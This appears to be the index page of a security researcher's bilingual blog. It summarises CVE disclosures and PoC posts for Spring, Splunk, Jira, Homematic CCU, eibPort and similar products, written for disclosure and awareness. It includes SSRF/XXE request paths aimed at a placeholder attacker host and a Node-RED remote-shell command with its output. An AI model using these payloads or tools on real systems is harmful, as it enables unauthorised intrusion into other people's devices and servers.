CVE-2025-41253 Using Spring Expression Language To Expose Environment Variables and System Properties
Overview
Intigriti's monthly challenge 1025: From SSRF via too simple blacklist filter to RCE and my post examination
Intigriti’s October 2025 challenge, what do we have here?
A fairly quickly solved challenge. But also a feeling of incompleteness which enabled me to learn more than I had planned.
CVE-2025-41243 PoC for SpEL property modification using Spring Cloud Gateway Server WebFlux
CVE-2025-41243: Spring Expression Language property modification using Spring Cloud Gateway Server WebFlux is out and got CVSS score 10.0.
CVE-2022-43571 Splunk RCE – my personal journey to color your life
Only because I got the statement from my IT department, there are no reasons for a SPLUNK update, I analyzed this vulnerability CVE-2022-43571 to prove the opposite for a remote code execution.
CVE-2023-32714 Splunk App for Lookup File Editing, PoC exploit for path traversal
This time I have analyzed the vulnerability of CVE-2023-32714 Path Traversal in Splunk App for Lookup File Editing.
CVE-2024-36985 Splunk Remote Code Execution through lookup in splunk_archiver application, my PoC exploit
This time I have analyzed the vulnerability of CVE-2024-36985 Remote Code Execution in Splunk splunk_archiver App.
Splunk feature(?) to fingerprint OS patch level
Splunk has at least three interesting API endpoints which are called after login.
They are providing server details about it’s OS patch level.
Entersekt Transakt secure gateway - Remote Code Execution via OpenSSL diagnostics in GA 23.1-4824 patch 1 and GA 23.1-4825 patch 2
The product “Transakt” from Entersekt is known / used in financial market latest since European PSD2 as 2-FA authentication. There are whitelabel smartphone apps from different financial institutions play store search for ‘com.entersekt.authapp’
Atlassian fingerprinting Jira or Confluence version as unauthenticated user
The Atlassian Jira or Confluence version can usually only be identified when logged in.
However, there is a way to apply a fingerprint to the Tomcat version by provoking an Tomcat error message.
Here is just one way for each.
CVE-2022-44729 PoC for Atlassian Jira SSRF due to Apache Batik vulnerabilites
Here is my Proof of Concept for a SSRF in Atlassian Jira via three different SVG tags and two possible triggers in Jira.
CVE-2022-26377 Apache httpd AJP request smuggling - a proof of concept payload generator
While searching for a HTTP request smuggling possibility in my security exploration of Entersekt Transakt secure gateway which is HAproxy 1.5 based, I saw the CVE-2022-26377 Apache httpd mod_proxy_ajp request smuggling.
Hmm, I have such project setup for another component…
Searching for the reporter I found his blog. Thanks to DeepL or Google translate, the chinese page is readable for the rest of the world.
I created a payload generator based on allyshka ‘s script for CVE-2020-1938 Ghostcat - Apache Tomcat AJP vulnerability and BINGO it’s working.
In our special case I could create a Denial of Service on-top.
Keycloak behind reverse proxy with mTLS for X.509 login flow. Possible vulnerability to bypass or spoof the X.509 credentials
Smuggling HTTP headers through reverse proxies as vulnerability to spoof the Keycloak X.509 login flow.
Is that possible?
Exploration of Entersekt Transakt secure gateway - a security analysis
The product “Transakt” from Entersekt is known / used in financial market latest since European PSD2 as 2-FA authentication. There are whitelabel smartphone apps from different financial institutions play store search for ‘com.entersekt.authapp’
Log injection or log forging with control characters and ESC- & CSI-sequences
Since long time I already get some nice log file entries in various projects by using newline, backspace, other control characters AND ESC- & CSI-sequences to inject the log file.
Only to confuse the admin or the log aggregation system as SPLUNK, Grafana Loki, etc.
Sometimes there could be a monitoring alert notification setup where someone needs to react as on-call duty.
Nobody wants to do this at night!!!
tado° Internet Bridge - Eine Schwachstellen-Analyse der Kommunikation auf mögliche Sicherheitslücken
Ich habe mir ein tado° Starter Kit - Smartes Heizkörper-Thermostat V3+ zugelegt.
Bevor es mit der Ersteinrichtung losging, wollte ich wissen, was die Internet Bridge so alles macht.
Damit das System nicht durch jeden x-beliebigen Hacker angegriffen werden kann, mit der Konsequenz das dieser sieht wo das System verbaut ist und am Verbrauch Rückschlüsse auf eine mögliche Abwesenheit ziehen kann, habe ich es mir aus Sicht eines Angreifers angesehen.
(kein) echtes Sicherheitsbewusstsein von eQ-3 zu Homematic CCU Sicherheitslücken?
Ob eQ-3 als Hersteller der Homematic CCU das Thema Sicherheit wirklich ernst nimmt oder nur pressewirksam in einer Eigendarstellung darüber berichtet, wie zuletzt am 18.03.2019 die eQ-3 Pressemitteilung aka CVE-2019-10119 CVE-2019-10120 CVE-2019-10121 CVE-2019-10122, ich weiß es nicht ich glaube es durch meine bisherigen Erfahrungen nicht mehr.
Ich als Melder von potentiellen Sicherheitslücken fühle mich jedenfalls zum Ende hin nicht ernst genommen.
Auch die bisher schon bekannten 6 CVEs aus dem Jahr 2018, davon 3 schwere Sicherheitslücken, siehe Übersicht auf www.cvedetails.com, sind teilweise heute noch nicht behoben worden oder erst “frisch” nach einem Jahr.
Leider teils nur oberflächlich geflickt….
SSRF found and fixed in open.isogeo.com
A SSFR vulnerability was resolved in open.isogeo.com using the path https://open.isogeo.com/map/schema://url
Mehrere Schwachstellen (SSRF, XXE, XML Bombe, Admin API Zugriff, etc.) im InGrid Framework (ingrid-webmap-client) geschlossen
Verschiedene Bundesländer- und Bundesportale für (Geo-)Metadaten enthielten einige Schwachstellen im InGrid Framework, die nun gefixt wurden:
- Drei Möglichkeiten einer XXE via SSRF
/ingrid-webmap-client/rest/wms/proxy/?url=https://SSRF_IP/xxe.xml /ingrid-webmap-client/rest/wms/proxy/layers?url=http://SSRF_IP/xxe_layers.xml /ingrid-webmap-client/rest/search/query?type=services&q=dummy&searchUrl=https://SSRF_IP/xxe_rss_channel_item.xml - XML Bombe via SSRF
- SSRF auf interne Systeme. Zumindest meine Testdatei wird nun nicht mehr ausgegeben, da sie eventuell nicht der erwarteten Struktur entspricht.
- Schreibender Admin Zugriff auf Daten, die unter anderem eine persistente XSS ermöglichen können
- Tomcat Version Disclosure Schwachstelle & Veralteter Tomcat Softwarestand
Analysing BAB TECHNOLOGIE eibport V3 to gain root SSH access
Because of the blind hit with CVE-2020-24573 in BAB TECHNOLOGIE GmbH eibPort V3 for a simple Denial of Service
and the gpg protected firmware file, I was in the mode of “challenge accepted”.
CVE-2021-28909 BAB TECHNOLOGIE GmbH eibPort V3 prior version 3.9.1 allow unauthenticated attackers to access uncontrolled the login service at /webif/SecurityModule in a brute force attack. The password could be weak and default username is known as 'admin'. This is usable and part of an attack chain to gain SSH root access.
Overview
CVE-2021-28910 BAB TECHNOLOGIE GmbH eibPort V3 prior version 3.9.1 contains basic SSRF vulnerability. It allow unauthenticated attackers to request to any internal and external server
Overview
CVE-2021-28911 BAB TECHNOLOGIE GmbH eibPort V3 prior version 3.9.1 allow unauthenticated attackers access to /tmp path which contains some sensitive data (e.g. device serial number). Having those info, a possible loginId can be self-calculated in a brute force attack against BMX interface. This is usable and part of an attack chain to gain SSH root access.
Overview
CVE-2021-28912 BAB TECHNOLOGIE GmbH eibPort V3. Each device has its own unique hard coded and weak root SSH key passphrase known as 'eibPort string'. This is usable and the final part of an attack chain to gain SSH root access.
Overview
CVE-2021-28913 BAB TECHNOLOGIE GmbH eibPort V3 prior version 3.9.1 allow unauthenticated attackers access to /webif/SecurityModule to validate the so called and hard coded unique 'eibPort String' which acts as the root SSH key passphrase. This is usable and part of an attack chain to gain SSH root access.
Overview
CVE-2021-28914 BAB TECHNOLOGIE GmbH eibPort V3 prior version 3.9.1 allow the user to set a weak password because the strength is shown in configuration tool, but finally not enforced. This is usable and part of an attack chain to gain SSH root access.
Overview
CVE-2020-24573 BAB TECHNOLOGIE GmbH eibPort V3 prior version 3.8.3 Denial of Service
Overview
CVE-2019-18937 eQ-3 Homematic AddOn 'ScriptParser' version 1.8 and prior on CCU2 and CCU3 allows Remote Code Execution by unauthenticated attackers with access to the web interface by usage of /addons/script/exec.cgi script, which executes TCL script content from HTTP POST request
Overview
CVE-2019-18938 eQ-3 Homematic AddOn 'E-Mail' version 1.6.8.c and prior on CCU2 and CCU3 allows Remote Code Execution by unauthenticated attackers with access to the web interface by usage of the save.cgi script for payload upload and the testtcl.cgi script for its execution
Overview
CVE-2019-18939 eQ-3 Homematic AddOn 'HM-Print' version 1.2a and prior on CCU2 and CCU3 allows Remote Code Execution by unauthenticated attackers with access to the web interface by usage of exec.cgi & exec1.cgi script, which executes TCL script content from HTTP POST request
Overview
CVE-2020-12834 eQ-3 Homematic CCU2 through 2.51.6 and CCU3 through 3.51.6 allow Remote Code Execution in JSON API Method ReGa.runScript by unauthenticated attackers with access to the web interface due to default auto-login feature enabled during first-time setup (or factory reset)
Overview
CVE-2019-9584 eQ-3 Homematic AddOn 'CloudMatic' on CCU2 and CCU3 allows uncontrolled admin access, resulting in the ability to obtain VPN profile details, shutting down the VPN service and to delete the VPN service configuration. This is related to improper access control for all /addons/mh/ pages
Overview
CVE-2019-19643 ise smart connect KNX Vaillant 1.2.839 Denial of Service
Overview
Angriffsvektoren auf aktuelle embedded Linux Busybox/Buildroot Systeme (IoT/Router/Smart Home) wegen Sicherheitslücken in veralteter Softwarebasis
Der initiale Post wurde am 27.06.19 verfasst.
Veraltete Busybox oder Buildroot Versionen können zu einem Problem werden, da diese Sicherheitslücken enthalten.
Heutzutage ist Software Pflege das A und O um nicht verwundbar zu sein.
Die Hersteller sind in guter Gesellschaft, es ist keiner Besser als der andere. Viele setzen teilweise veraltete oder sehr veraltete Versionen als Basis ein!
Wichtig zu wissen: Das Datum in der Versionsausgabe von Busybox ist das Datum der Kompilierung und nicht das Release Datum!
Es gibt alleine 17 CVEs zur Busybox als eigenständiges Produkt:
Busybox on cvedetails.com
Und es gab weitere Sicherheitsupdates, die nicht explizit als CVE bekannt geworden sind.
Zumindest die bekannten Lücken im DHCP und NTP wären dann eine Angriffsmöglichkeit.
Und die Buildroot in einigen Systemen ist wahrscheinlich noch viel mehr betroffen
Buildroot changes
Alle CVEs aufgelistet in den Commits, mit 50 Einträge pro Seite
Search CVEs in Buildroot commits - page 1
bis
Search CVEs in Buildroot commits - page 900
ergeben Stand heute 2019-06-27 932 Updates wegen Zuordnungen zu CVEs !!!
Bisher habe ich drei Anfragen mit dieser Fragestellung rausgeschickt
Ist ihnen die veraltete Busybox/Buildroot „Problematik“ bewusst und gibt es allgemeine Bestrebungen Firmware Releases auf neuerer Basis rauszubringen?
Zumindest die bekannten Lücken im DHCP und NTP wären dann eine Angriffsmöglichkeit.
CVE-2019-9582 eQ-3 Homematic CCU2 outdated base software packages allows Denial of Service
Overview
Smart Home: Testinstitute/Testergebnisse – Die Testdurchführungs-Fakten, die Wahrnehmung und am Ende die Annahmen die ein Verbraucher treffen könnte
Jeder hat schon einmal ein Testergebnis zu einem Produkt gesucht und sich auf dieses unabhängige Ergebnis verlassen. Bei „analogen“ Produkten ist das auch irgendwie nachvollziehbar.
Aber IoT / Smart Home Produkte kommunizieren teilweise in einem lokalen Netzwerk oder sind sogar über das Internet steuerbar.
Jedenfalls die Außenwirkung der Testergebnisse könnte dann zu Annahmen verleiten, die so gar nicht zutreffen.
Was genau wurde denn in welchem Umfang getestet und welches Produkt konkret des Herstellers?
Diese Fragen sollten einfach verständlich auch für Otto Normalverbraucher nachvollziehbar beantwortbar sein können.
Manche Einstiegsprodukte (Startersets) sind der Anfang einer komplexen Installation und man holt sich die eventuellen Probleme ins Haus.
Die Fragestellung an die Testinstitute Stiftung Warentest, dem VDE und AV-Test war immer mehr oder weniger dieselbe.
Hier der Hauptteil der Anfrage:
Falls sie an der Außenwirkung der von Ihnen vergebenen Zertifikate/Testergebnisse interessiert sind, hier mein persönliches Feedback und warum diese Nachfrage entstanden ist. Gleich vorweg, damit es zu keinem Missverständnis kommt. Es geht nicht um ihre Tests, sondern wie diese Verkaufsfördernd von den Herstellern eingesetzt werden könnten.
Wirbt ein Hersteller mit einem von Ihnen als (sehr) sicher eingestuftes Produkt, ist das eine ähnliche Wirkung wie ein Testergebnis bei Stiftung Warentest. Denn stellt er ein (sehr) sicheres Produkt her, so werden die anderen mind. auch den höchsten Ansprüchen entsprechen. Kaum ein Verbraucher wird sich im Detail darüber informieren, ob die andere Produktlösung vom selben Hersteller nicht eventuell unsicher ist. Der Hersteller wird damit jedenfalls nicht werben unsichere Produkte zu vertreiben.
Vielleicht grenzen Sie die Vergabe der Zertifikate eventuell deutlicher ab, damit beim Endverbraucher kein falscher Eindruck entsteht. Nur weil Produkt X (sehr) sicher ist, muss das für Produkt Y noch lange nicht gelten.
RedMatic als Homematic AddOn kann für Remote Code Execution missbraucht werden
RedMatic baut auf Node-RED auf und ist eine Erweiterung für Homematic CCUs.
Wenn der Node-RED Zugang ungeschützt ist, weil die Authentifizierung abgeschaltet wurde, kann ein Angreifer dadurch sofort eine Remote Code Execution auf dem System durchführen, ganz einfach über Port 80.
Node-RED liefert ja extra dokumentierte Möglichkeiten lokal Befehle ausführen zu können um Steuerungssequenzen umzusetzen.
Wenn nun der Zugang mit den Login Mitteln der CCU gesichert ist, kennen wir zumindest den Usernamen “Admin” und nur das Passwort muss per Bruteforce gefunden werden. Ein starkes/sicheres Passwort ist wie immer also sehr wichtig.
Ist der Zugang Individuell gesichert mit einer eigenen Username/Passwort Kombination, wird es schon schwieriger sein, die Zugangsdaten zu erhalten. Das starke/sichere Passwort ist hier natürlich auch zwingend notwendig um sich so gut wie möglich zu schützen.
Wie in dem Artikel von Quentin Kaiser Gaining RCE by abusing Node-RED aufgezeigt, ist eine RCE dann für RedMatic Systeme auch ausnutzbar, da es ja auf Node-Red aufsetzt.
Ein Websocket dient dabei als Shell Zugang. Echt verrückt, was technisch alles möglich ist, zumal dieses Python Skript den Angriff vollkommen automatisiert:
./noderedsh.py --username Admin --password mySecret http://1.2.3.4/addons/red
.....
[+] Establishing RCE link ....
> ls -l
total 4840
-rw-r--r-- 1 root root 43 Sep 5 14:57 VERSION
........
Also bitte niemals die Authentifizierung abschalten oder einfache Passwörter nutzen.
Es gibt so viele technisch unerfahrene Benutzer, die sich nicht vorstellen können, das und wie einfach potentielle Sicherheitslücken oder wie hier falsche Konfigurationen ausgenutzt werden können. Wenn dieser Artikel auch nur einen Anwender sensibilisiert, ist das Ziel erreicht.
Der Blogeintrag wurde am 06.10.19 etwas umgeschrieben, da im Homematic Forum der Stil diese Artikels angekreidet wurde.
Die HM Forum Gemeinde ist da etwas eigensinnig. Es ist immer das eventuelle Portforwarding oder der Nutzer das Problem, aber nie die unsichere CCU, die es dem Angreifer wirklich sehr einfach macht.
Wenn schon das Smart Home kein primäres Ziel des Hackers ist, schon mal von Mirai oder Echobot gehört?
Ich möchte hier nur die sensibilisieren, die sich unwissentlich angreifbar machen und bei Smart Home nicht nach dem Motto no Risk no Fun leben wollen.
Das dies auch in echt passiert, zeigt dieser Thread ich wurde “gehackt”. Aber hier war RedMatic bestimmt nicht im Spiel, da reichte schon eine der vielen Sicherheitslücken im ReGa Prozess.
CVE-2019-16199 eQ-3 Homematic CCU2 prior 2.47.18 and CCU3 prior 3.47.18 allow Remote Code Execution by unauthenticated attackers with access to the web interface via a HTTP POST request to certain URLs related to the ReGa core process
Overview
IoT Malware 'Mirai' Abkömmling Echobot befällt auch Homematic CCU Zentralen
Im Mai hatte das BSI über Twitter vermeldet, das sehr viele Homematic Systeme aus dem Internet erreichbar sind.
Das hatte scheinbar niemanden interessiert und wurde somit nicht weiter verbreitet.
Ende August gab es eine erneute Meldung welche von Heise aufgegriffen wurde, womit das Thema etwas mehr Aufmerksamkeit bekommen hat.
Das Thema ungeschütztes Portforwarding jetzt mal völlig außen vorgelassen, es wird oft und gerne darüber diskutiert, was es bei einer Smart Home Installation schon zu holen gäbe.
Auch fragen sich einige Nutzer im Homatic Forum warum die Sicherheit jetzt so übertrieben in den Fokus gerückt wird.
Bisschen Lampen an/aus, Heizungsthermostate regeln, gut ist. Eine Keymatic wäre schon interessanter und der Worst Case wenn in der CCU noch die Geo-Location Daten brav vom Besitzer auf den Meter genau eingetragen wurden, dann ist ja alles klar wo die Tür aufgeht….
ABER der aus 2016 bekannte Mirai Schädlich, der IoT Geräte im großen Stil für ein Botnetz missbraucht hat, besitzt einen Abkömmling Namens Echobot. Dieser versucht mit einer alten Sicherheitslücke der Homematic CCU auf das System zu kommen.
Wenn schon keiner daran interessiert ist, digital ins Haus einzubrechen, so ist ein Botnetz für Spam Versand und DDoS Attacken sehr wohl interessant für den gemeinen Botnetz Betreiber.
Process restart / Denial of Service by logfile injection on Tanuki Software Java Service Wrapper filter action
Recently, when I played with logfile injection, I found a nice catch in the filter action of Tanuki Software’s Java Service wrapper when OutOfMemoryError Detection is used.
CVE-2019-14986 eQ-3 Homematic CCU2 and CCU3 with the 'CUxD' AddOn version prior 2.3.0 installed allows administrative operations by unauthenticated attackers with access to the web interface, because features such as File-Browser and Shell Command (as well as 'Set root password') are exposed
Overview
CVE-2019-14985 eQ-3 Homematic CCU2 and CCU3 with the CUxD AddOn installed allows Remote Code Execution by unauthenticated attackers with access to the web interface, because CUxD 'CMD_EXEC' virtual device type 28 is not protected against external usage
Overview
CVE-2019-14984 eQ-3 Homematic AddOn 'XML-API' version 1.2.0 and prior on CCU2 and CCU3 allows Remote Code Execution by unauthenticated attackers with access to the web interface by usage of /addons/xmlapi/exec.cgi script, which executes TCL script content from HTTP POST request
Overview
CVE-2019-14474 eQ-3 Homematic CCU3 has Improper Input Validation in function 'Call()' of ReGa core logic process, resulting in the ability to start a Denial of Service. Due to Improper Authorization an attacker can obtain a session ID from CVE-2019-9583 or a valid guest/user/admin account can start this attack too
Overview
CVE-2019-14475 eQ-3 Homematic CCU2 and CCU3 use session IDs for authentication but lack authorization checks. An attacker can obtain a session ID from CVE-2019-9583, resulting in the ability to read the service messages, clear the system protocol, create a new but not working user account in the system, modify/delete internal programs, etc. pp.
Overview
CVE-2019-14473 eQ-3 Homematic CCU2 and CCU3 use session IDs for authentication but lack authorization checks. Consequently, a valid guest level or user level account can create a new admin level account, read the service messages, clear the system protocol or modify/delete internal programs, etc. pp.
Overview
CVE-2019-13030 eQ-3 Homematic CCU3 AddOn 'Mediola NEO Server for Homematic CCU3' prior 2.4.5 allows uncontrolled admin access to start or stop the Node.js process, resulting in the ability to obtain mediola configuration details. This is related to improper access control for addons configuration pages and a missing check in rc.d/97NeoServer
Overview
CVE-2019-9585 eQ-3 Homematic CCU2 prior 2.47.10 and CCU3 prior 3.47.10 JSON API has Improper Access Control for Interface.***Metadata related operations, resulting in the ability to read, set and deletion of Metadata
Overview
CVE-2019-9583 eQ-3 Homematic CCU2 and CCU3 obtain session IDs without login. This allows a Denial of Service and is a starting point for other attacks
Overview
How this blog started, because I own a Homematic "Smart Home" control unit.
Testing is my passion. Sharing knowledge is my contribution.
Every family has a skeleton in the cupboard.
And I like to burn down software from testers point of view. Developers ….they “(dis)like me” :-)
For CVE submission and publication an external reference with CVE detail description is required.
Finally my blog was born.
Cve 2021 45093
nothing yet